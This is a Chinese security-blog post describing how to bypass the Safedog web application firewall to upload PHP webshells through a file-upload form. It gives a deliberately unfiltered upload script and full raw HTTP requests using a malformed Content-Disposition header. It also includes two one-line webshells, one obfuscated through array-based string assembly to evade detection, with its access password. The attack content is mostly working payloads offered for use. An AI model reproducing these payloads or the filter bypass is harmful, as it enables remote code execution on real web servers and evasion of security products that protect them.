记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

2017绕过最新安全狗上传

2017-04-16 23:44

目前研究出有十多种过狗的办法,在后期将会更新绕过各种WAF的经验,以及HTTP协议的基础知识。

本文章的所有内容,包括文字、图片,均为原创。对未经许可擅自使用者,我们保留追究其法律责任的权利。

首先贴出测试代码,这个是没有过滤文件类型的,我开启安全狗的上传拦截

<?php
<?php
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "Upload: " . $_FILES["file"]["name"] . "<br />";
echo "Type: " . $_FILES["file"]["type"] . "<br />";
echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "Stored in: " . $_FILES["file"]["tmp_name"];
}
?>

我们先去直接上传一个PHP一句话木马测试:

 

科拉实验室-绕过最新安全狗上传

已经被拦截了,然后我们继续测试

 

科拉实验室-绕过最新安全狗上传

上传成功。

科拉实验室-绕过最新安全狗上传

贴出成功的数据包:

POST /upload.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/
Cookie: safedog-flow-item=886C7483
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------166791069611484
Content-Length: 341
 
-----------------------------166791069611484
Content-Disposition:*; name="file"; filename="AutoLoad.class.php"
Content-Type: application/octet-stream
 
<?php assert($_POST[cmda78]);?>
 
-----------------------------166791069611484
Content-Disposition: form-data; name="submit"
 
Submit
-----------------------------166791069611484--

但是我们的一句话木马并不免杀。我自己写了一个,分享给大家!

科拉实验室-绕过最新安全狗上传

贴出数据包以及测试的一句话木马还有运行截图:

 

POST /upload.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/
Cookie: safedog-flow-item=886C7483
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1574965867356
Content-Length: 1073
 
-----------------------------1574965867356
Content-Disposition: *; name="file"; filename="cora.php"
Content-Type: text/plain
 
<?php
$p = array('f'=&gt;'a',
#afffffffff
'pffff'=&gt;'s'/*223* 1*/,
'e'=&gt;'fffff',//FJKSJKFSNMFSSDSDS//D*SA/*DSA&amp;*$@&amp;$@&amp;(#*(
'lfaaaa'=&gt;'r',//FJKSJKFSNMFSSDSDS//D*SA/*DSA&amp;*$@&amp;$@&amp;(#*(;
'nnnnn'=&gt;'t'//&amp;$@&amp;(#*(;
);//&amp;$@&amp;(#*(;
$a = array_keys($p);//9*9*5656
@$_=$p['pffff'].#/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/
$p['pffff'].$a[2];
@$_=#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$p['f']./*-/*-*/$_.#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$p['lfaaaa'].$p['nnnnn'];#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@$_#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
($_REQUEST[#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
'username'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
]);
?>
-----------------------------1574965867356
Content-Disposition: form-data; name="submit"
 
Submit
-----------------------------1574965867356--

密码是:username //主要思路还是用了数组进行字符串的拼接。

科拉实验室-绕过最新安全狗上传

目前研究出有十多种过狗的办法,在后期将会更新绕过各种WAF的经验,以及HTTP协议的基础知识。


知识来源: blog.cora-lab.org/37.html

阅读:473177 | 评论:0 | 标签:研究 bypass http php WAF 免杀一句话 安全狗 过狗上传

想收藏或者和大家分享这篇好文章→复制链接地址

“2017绕过最新安全狗上传”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云